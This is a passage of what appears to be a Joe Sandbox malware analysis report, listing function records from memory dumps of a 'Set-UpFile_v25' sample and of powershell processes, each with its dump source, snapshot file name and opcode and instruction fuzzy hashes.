                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5bfd66f19134a4134f3d74837f32afa63de4004eec2550920f38a2e49ddb3ebc
                                                                                                                                                                • Instruction ID: 4ef754625fe5451805e74e5f3d365c8fc7d3ff1b7b30a51b480a312fa79ceb99
                                                                                                                                                                • Opcode Fuzzy Hash: 5bfd66f19134a4134f3d74837f32afa63de4004eec2550920f38a2e49ddb3ebc
• Instruction Fuzzy Hash: 49616D3160C3915FC7258F38C8A192EBBE1AF95224F48C6BDE8E857392D775D805CB92
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6d93699f8fdf69829a0f42ab1896b4d56d850c051612aef44568b3cac2b5f57
• Instruction ID: d2dfdffd00641cd3d25a7bc31356e06b58d27e552483c8a9043fd9a0770cef65
• Opcode Fuzzy Hash: d6d93699f8fdf69829a0f42ab1896b4d56d850c051612aef44568b3cac2b5f57
• Instruction Fuzzy Hash: 7251073774998047EB28CA3C5C2137E7A934BDB230B2DC76BE5B6873E6D56548018355
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9ed09ed44aee735551ebb43ee4ee4a807c2cf956bae131a1abaf13d327c03fe8
                                                                                                                                                                • Instruction ID: 6e9d877b51cf939d87c74f9becfc70b0ac1bea0ade0fc92a1a565dd1b079a70b
                                                                                                                                                                • Opcode Fuzzy Hash: 9ed09ed44aee735551ebb43ee4ee4a807c2cf956bae131a1abaf13d327c03fe8
                                                                                                                                                                • Instruction Fuzzy Hash: F021F37264C3515BD324CF249C51B4FBBD2EBC2714F1ACA3DE4869B2C2D6B594068B86
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c8293ba00d99fcaa8ef134afd0ae66512aec97933e057fa5f4de29d468f769d8
                                                                                                                                                                • Instruction ID: ad60bb83d56e6783ff5d130f60b828e5bc807b3ebb39ee408acc4a09b686b55f
                                                                                                                                                                • Opcode Fuzzy Hash: c8293ba00d99fcaa8ef134afd0ae66512aec97933e057fa5f4de29d468f769d8
                                                                                                                                                                • Instruction Fuzzy Hash: EC319AB5519341DBCB249F68C499ABBB7F1FF96320F18891CD0CA8B2A4EB348540CB52
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1d69aa75fcd049e72a5a02e26ede0f8c7d8d11e79f362e88839c8a3011fffe7a
                                                                                                                                                                • Instruction ID: f4a8ba5afa033bb9a2a4abfacad4c5d6db5a9307fdf3c22d6b0dc5552a1a5b6e
                                                                                                                                                                • Opcode Fuzzy Hash: 1d69aa75fcd049e72a5a02e26ede0f8c7d8d11e79f362e88839c8a3011fffe7a
                                                                                                                                                                • Instruction Fuzzy Hash: 0E21C877A11A144BE310CE69CC4478533D6B7C4328F7E86B8C5759B792D677AD038680
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0bf97a9c36bd17cda4c3dab7901b263921ad2b874c3b87d784035a392ac44cc8
                                                                                                                                                                • Instruction ID: 1e4daf585a71fd9016090233486aaa621a33c7a453a692dd2741fcb3f8e0608c
                                                                                                                                                                • Opcode Fuzzy Hash: 0bf97a9c36bd17cda4c3dab7901b263921ad2b874c3b87d784035a392ac44cc8
                                                                                                                                                                • Instruction Fuzzy Hash: 65218D701183019BDB24CF18C881B7E77B6EF85324F148A2DF1A5872E1E3B19984CB4A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0d81b36ab5122245732b150acd26a7407b3ee5bb1b47bae9bd8d40f9febd2894
                                                                                                                                                                • Instruction ID: d59d8afbd37a71d40445721dce7df88ebd012a3d6d7b200bacb1d6ec987e4dad
                                                                                                                                                                • Opcode Fuzzy Hash: 0d81b36ab5122245732b150acd26a7407b3ee5bb1b47bae9bd8d40f9febd2894
                                                                                                                                                                • Instruction Fuzzy Hash: 3711C077A493115FC304DE28CC54AAFBBE3ABC5304F1ACA6DE48857704CA7599058BC2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                • Instruction ID: d3ba88f1bc566810f2323ee003ef502654ce28aec09808aedea011f18f8dbaf1
                                                                                                                                                                • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                • Instruction Fuzzy Hash: 24317374E00259DFCB08CF98C590AAEBBB1FF88314F248599D815BB345D775AA82CF94
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c49f164eaf909373f88d79aa5ce4e5f35ad1209994744bcfc438d6e1c69f066d
                                                                                                                                                                • Instruction ID: 692524ea7dde5367012b3ac1d888f87498105dc366619fb1afc1902fa507784e
                                                                                                                                                                • Opcode Fuzzy Hash: c49f164eaf909373f88d79aa5ce4e5f35ad1209994744bcfc438d6e1c69f066d
                                                                                                                                                                • Instruction Fuzzy Hash: 91012CF1B0030157E720AE5C95E0B3BB2ADAF95708F18493CD89957302EB75E8059BE9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2002f25d54dc64b5be8fc0fabfc0b6cc1cff300f7fa11f028fb868e6e050b805
                                                                                                                                                                • Instruction ID: 137026e5644d9cdd87c58a18fcecb70f281e339a6b335318634c116df847da7e
                                                                                                                                                                • Opcode Fuzzy Hash: 2002f25d54dc64b5be8fc0fabfc0b6cc1cff300f7fa11f028fb868e6e050b805
                                                                                                                                                                • Instruction Fuzzy Hash: F311CC75A142009FD7208B5C8844BBBF3A6E7C6330F28873DF495571D5DB3498418B99
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 235aade8cfda86804b9262fadacc57fa8766ff46ec5d742e3dee61bd750f1b6c
                                                                                                                                                                • Instruction ID: b2a82e6634760f7d03cbdb98f1dda37d41bbdf1d2958dcfeca3437ddef475cea
                                                                                                                                                                • Opcode Fuzzy Hash: 235aade8cfda86804b9262fadacc57fa8766ff46ec5d742e3dee61bd750f1b6c
                                                                                                                                                                • Instruction Fuzzy Hash: 8201A2346161028FCF18DF2C9891936B3ADFB47325F28E53CD49193150F330D8919A19
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 02857f7856dacbf7de50f48d66221ea3b217e52ba00610d7a1f2b2f17cd52e88
                                                                                                                                                                • Instruction ID: 05a656ffc0f156eaef921da0ef1e23e396848d02d7a4b5f7d206687cf7bd4428
                                                                                                                                                                • Opcode Fuzzy Hash: 02857f7856dacbf7de50f48d66221ea3b217e52ba00610d7a1f2b2f17cd52e88
                                                                                                                                                                • Instruction Fuzzy Hash: C401A2604083818BC7168F2580B022AFBE0EFB7349F08989AE8D29B212E335D455CB66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
Function records (execution graph, continued). Every function in this run of records was lifted from the same memory dump: Source File 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false, Joe Sandbox IDA Plugin snapshot hcaresult_0_2_2980000_Set-UpFile_v25.jbxd. None of these functions has an API ID, String ID or API String ID, a Yara match or a Similarity entry, and in every record the Opcode ID is identical to the Opcode Fuzzy Hash, so the two are listed once per function.

• Opcode ID / Opcode Fuzzy Hash: 5c8c3cdfaae57673cfd8b30e47bbdc9f81b332e5934e5216a320c01eb433e3d2
• Instruction ID: 45e2e1a555213a41d75628eea3e98b44e4e85989f9146f86a9a62e6845d3636f
• Instruction Fuzzy Hash: 5511C673A129419BF3094E19C824356EB63AFD2215F1DC25DC0680BB8DCF79541A8B80

• Opcode ID / Opcode Fuzzy Hash: 867716a56c5ddbd2339e452c325c2570f5d209fc07af71fc2af4bf56226273a1
• Instruction ID: f59990414db31056b552e66ff902e397134b832176f7783babf335819e1f1d6e
• Instruction Fuzzy Hash: 56F0BB75A013009FDA149F14DCA153E73B6FB92315F64692CE492531A4D331DC54CB89

• Opcode ID / Opcode Fuzzy Hash: b8d75ba11848f37334e33f3ee6bc273d17a2ef0306c9cae138f3f2ff2027f673
• Instruction ID: ccf46f73d0e14bc9064cba944d05586f1fb7a735a57d80dbc482e197f2dbfb0a
• Instruction Fuzzy Hash: D7F0A476504308EBD1204B459C81D37B76EEB8EB2CF24033DF958531A1E322EE51CBA6

• Opcode ID / Opcode Fuzzy Hash: 997393ea9fb04f19f6f221c67a65246d984ddd09cc78f2bf2a448fd4914494e4
• Instruction ID: 6ee3217d2436d5e968464ba8d00cac91c49ab468ca0f510504bec31d76565df9
• Instruction Fuzzy Hash: 4D01F474A05211CFD718CF0CD89153AB3AAEBA6314F540A3CF28123261E334AC16CB96

• Opcode ID / Opcode Fuzzy Hash: 6b60d92f034b1d3e42354d3c585600494f47b129c7cfa50f561b72fa9a9e639e
• Instruction ID: e6bd2095fef3a5b2cda7854111c6619c4543ed34b4ac111c22dab607d2d7838e
• Instruction Fuzzy Hash: B6F0C2705096918FEB268F3D989023AFBE2BF5B210F1891ADC1D29B297C635E442CB15

• Opcode ID / Opcode Fuzzy Hash: 72609d23d3f0ca88a1a6546ce7761e9877870bf706f1c736c72ef269828dc019
• Instruction ID: 4ed62b722324772d1cd3d1c111aeb2aa50ff8d6bfeb5cfd7b2353fcc1df05613
• Instruction Fuzzy Hash: C5F090729065428BE3094E25C824325FB63AFD2214F5DC25AC0641BB89CBB9541A8B84

• Opcode ID / Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
• Instruction ID: 0163c8cd7962fe3bdcb9eeb379d0cf8d158993bdd92e8a56ad82b732ef202752
• Instruction Fuzzy Hash: DF01B634A01208EFCB15EF98C194AACF7B6FF48314F648599D8159B385E731BE46DB50

• Opcode ID / Opcode Fuzzy Hash: 765806fde20d8dcc7fcfe6c8729d71e89f661a911a86bf786ca863ebb5393a0e
• Instruction ID: b5e30ed1dd1bd535dbe819dc3d90314d132179eb0108d758df8c6a23f75f008d
• Instruction Fuzzy Hash: 09F05875A09301DFCB14CF28D8A052EB3F5FF96306F58A828E48693128D330E844CB4A

• Opcode ID / Opcode Fuzzy Hash: 0456bf1ec266ed6600d3704076b4c01ba8b36363b32de00f05b1f8b2243114ca
• Instruction ID: 8bb6a226bd8e72e6db49d1bf2439088f4b93ea9b8e809485632a8d5fdce1314b
• Instruction Fuzzy Hash: 53F0DA3999928086C368FB14D8709E9B372AFE5319F9A682D808A13150DF307A4BDE95

• Opcode ID / Opcode Fuzzy Hash: 57d4475b23516832be138171ae162e5f203d8e09132b8bb9a7d75c8523c0a536
• Instruction ID: 1a9eb7405c8cbef94589eba3ef3fbc4761dea260f4efd0b0bce4cbf883b93e27
• Instruction Fuzzy Hash: 26D02B0184C7728E421C0E0440B13B0D5267FA3248B18C39084F927A1DC6428C478AD4

• Opcode ID / Opcode Fuzzy Hash: 6aa58c32fd690b776d74c4e1317dc42f764286d9f7f2d00c556c5013b3098f9a
• Instruction ID: 3a43958e8847f5015855b174c05cbbbd0b69a8c932eda76d430439d300f6dc39
• Instruction Fuzzy Hash: BDE01A7090C3408BE712AF2CD16536BFBE4AB87310F909D5CD4D48B292D3BE94698B47

• Opcode ID / Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
• Instruction ID: 85e8c743f2d431835b909fdf04402ee1994981aa3ae252a51ea612406ba04c3b
• Instruction Fuzzy Hash: EDD0A7719487A50E5B68CD3404B0477FBECE947622F18159EE8D5E3119D320D8014A9C

• Opcode ID / Opcode Fuzzy Hash: d087fa91208b593d2c70268908f23f03f2b4ec53e294519b1fbd61e6f77adf78
• Instruction ID: 7313cf0884d1d276f0e3abe2ac3a455dfc8328a1998be270ec1e925e58a2c175
• Instruction Fuzzy Hash: 02C01279A084028FC600DF28C890CA5BBB6A38B200B06A468C848D3264D734E9028A08
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0284827c023eb69505ee92246e1337a2e8b44741b25114c43f03babfb873e9a0
                                                                                                                                                                • Instruction ID: ffb79f2734df539b3f4905129d35f90c14d05c8d403a6557f8227ca74cb6777b
                                                                                                                                                                • Opcode Fuzzy Hash: 0284827c023eb69505ee92246e1337a2e8b44741b25114c43f03babfb873e9a0
                                                                                                                                                                • Instruction Fuzzy Hash: 1EC08C31806A00D6C7209F0080412B3F378B783334F26E72988B4771C0A770F8098BE9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e12dc24b8c468de5dd0fc2b79d50133aadbf51828ef8d51ed1458c28cec9c938
                                                                                                                                                                • Instruction ID: be1d001aac084a8cf0b4b3d7e5dc32493ceff045fd9db250b316d8bf338a28f3
                                                                                                                                                                • Opcode Fuzzy Hash: e12dc24b8c468de5dd0fc2b79d50133aadbf51828ef8d51ed1458c28cec9c938
                                                                                                                                                                • Instruction Fuzzy Hash: ABA0017480A51CCE82041F209408078F67AAA0B292F4430A49009A7025CAB180459A0C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 09c3cfbb33b4717926892e9a8f119b369b111ae4626cec583d8bbe7fc334ecc1
                                                                                                                                                                • Instruction ID: df7e4febcfc9f04f7ec5ef770061f24e36abf75ef40a170cceb2b2ed107cc84a
                                                                                                                                                                • Opcode Fuzzy Hash: 09c3cfbb33b4717926892e9a8f119b369b111ae4626cec583d8bbe7fc334ecc1
                                                                                                                                                                • Instruction Fuzzy Hash: BD124C74A002499FCB05CF98D494AAEFBF2FF48350F258599E805AB365C735EE85CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cdaa17bbd30656771a27857a3d7ed7decbb5815f1913b51efe48cb3de96141cd
                                                                                                                                                                • Instruction ID: d0073da8277935ae648706549cf9c921b88238ff7dbb9aed038387d9b6d939f9
                                                                                                                                                                • Opcode Fuzzy Hash: cdaa17bbd30656771a27857a3d7ed7decbb5815f1913b51efe48cb3de96141cd
                                                                                                                                                                • Instruction Fuzzy Hash: 57D16034A052489FCB05CFA8D580A9EFBF1EF49314F2581D5E844AB366C735ED89CB90
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fb5374a0f8ffc67814e097266c3ed7562c74903696e0c5ef31642331609d96a7
                                                                                                                                                                • Instruction ID: f689c7008ea276feeaad8e884efd6217f6a0cd20f3738bb16f7fbff5d27531c0
                                                                                                                                                                • Opcode Fuzzy Hash: fb5374a0f8ffc67814e097266c3ed7562c74903696e0c5ef31642331609d96a7
                                                                                                                                                                • Instruction Fuzzy Hash: 8E413E72F402158FC765F6B89851A9ABBA29FD2314B1045FAD5019F352EE21C847C7E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3931c62a5e3f7769b57b37a26d13e8060ea66f99e001d9fc73896f3f4cedf73c
                                                                                                                                                                • Instruction ID: 28252059507e68cf25341a04997cc06bd1523f2e7363f89923edd1c4833a5d12
                                                                                                                                                                • Opcode Fuzzy Hash: 3931c62a5e3f7769b57b37a26d13e8060ea66f99e001d9fc73896f3f4cedf73c
                                                                                                                                                                • Instruction Fuzzy Hash: E24138B4A005058FCB0ACF58C194AAAFBF1FF48750B158199D845AB364C736FE55CFA0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9b812749c5ca4916d2ecbc1e2b58953e17dc0164aa59ada6f60f86c19365ac66
                                                                                                                                                                • Instruction ID: f07ec1d132a3edbeee225fe46328d7efc62751318fc692f93bd4369dd47729d1
                                                                                                                                                                • Opcode Fuzzy Hash: 9b812749c5ca4916d2ecbc1e2b58953e17dc0164aa59ada6f60f86c19365ac66
                                                                                                                                                                • Instruction Fuzzy Hash: 10315074A096858FCB02CF58C890AEAFFB0FF4A310B1581D7D444EB662C335AD45CBA1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cf765f724520ba07dca25a59af5ebd504036b7e1f1d1247b565242b85f1acfe6
                                                                                                                                                                • Instruction ID: 20e9b7b1cc76adcc1a15b00448731d821294f4b2e89eeb7dac0bde28c97c2f26
                                                                                                                                                                • Opcode Fuzzy Hash: cf765f724520ba07dca25a59af5ebd504036b7e1f1d1247b565242b85f1acfe6
                                                                                                                                                                • Instruction Fuzzy Hash: 5E4126B4A005099FCB09CF48C194AAAFBF1FF48750B1181A9D905AB364C736FE50CFA0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c1a7287e3563e0b8510ce09716b6da64d753f67e2a6b27ba526ff1e5d3ec6113
                                                                                                                                                                • Instruction ID: 970d5c5372a73716f16c6b5959f2955986ef8499b968be5bb6e105246aeeb490
                                                                                                                                                                • Opcode Fuzzy Hash: c1a7287e3563e0b8510ce09716b6da64d753f67e2a6b27ba526ff1e5d3ec6113
                                                                                                                                                                • Instruction Fuzzy Hash: 1B211974A016099FCB01CF59C980AAEFBF1FF49310B248596E919EB361C735EC41CBA0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970691715.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_b50000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 78a067a503f4c804ec8e482f914b647884231a757034bed7d33a5fb25b6df716
                                                                                                                                                                • Instruction ID: ffc905ddda10a5580f80b038d8f88c27c99f584c4d4bb98b000bca038d74df7a
                                                                                                                                                                • Opcode Fuzzy Hash: 78a067a503f4c804ec8e482f914b647884231a757034bed7d33a5fb25b6df716
                                                                                                                                                                • Instruction Fuzzy Hash: 63214D74A002198FCB00DF9DD480AAEFBF5FF89314B1485A5E919AB352C731ED45CBA0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970403084.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_74d000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8ad3b3898efba0afa8f96fdadf384720cab6a4792946a4f558ac6e0af3661978
                                                                                                                                                                • Instruction ID: b73f52e19b38f94fc6c6565b0234dc49e85339dd29228299daea6994e5f4a47d
                                                                                                                                                                • Opcode Fuzzy Hash: 8ad3b3898efba0afa8f96fdadf384720cab6a4792946a4f558ac6e0af3661978
                                                                                                                                                                • Instruction Fuzzy Hash: 3801A2715093409AE7308A29CD84B67BF98EF51324F18C56AED884B266C77D9C45CAB1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970403084.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_74d000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
• String ID:
• API String ID:
• Opcode ID: 042fb91e483d303bec4ba370dbe15642156df6ed660e42c8d0949f921d5382d4
• Instruction ID: 7c4a234ba8be58d4e73d72b9264e4e77d42900804a083fff0791e54f8644d7b6
• Opcode Fuzzy Hash: 042fb91e483d303bec4ba370dbe15642156df6ed660e42c8d0949f921d5382d4
• Instruction Fuzzy Hash: 5BF06271405344AEE7208A1ACDC4B66FFA8EB51734F18C55AED884F296C3799C45CAB1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$l$l
• API String ID: 0-671944917
• Opcode ID: 956132871a0a7d745d63d52a8158ba795538f9e1033a5a557ac85d582dcabb94
• Instruction ID: 0548929d3fd589eaad2e10363c02672a3d2ea2d27f3f489b839a98778c94ea7d
• Opcode Fuzzy Hash: 956132871a0a7d745d63d52a8158ba795538f9e1033a5a557ac85d582dcabb94
• Instruction Fuzzy Hash: A3A15632F043558FD765AA79981066BBBE6AFC5210B1884EAD445CB362DF32CC49C7E1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q$$^q$l$l
• API String ID: 0-1462244110
• Opcode ID: ad6575ef8b63c0bb9b433dee3c4d1ef9e87c7277ee959e007020d47cd95ce3f6
• Instruction ID: 7cbe25e4bbee3c287a3b24822636ca54ace503c49c127b960b3c122d977952c9
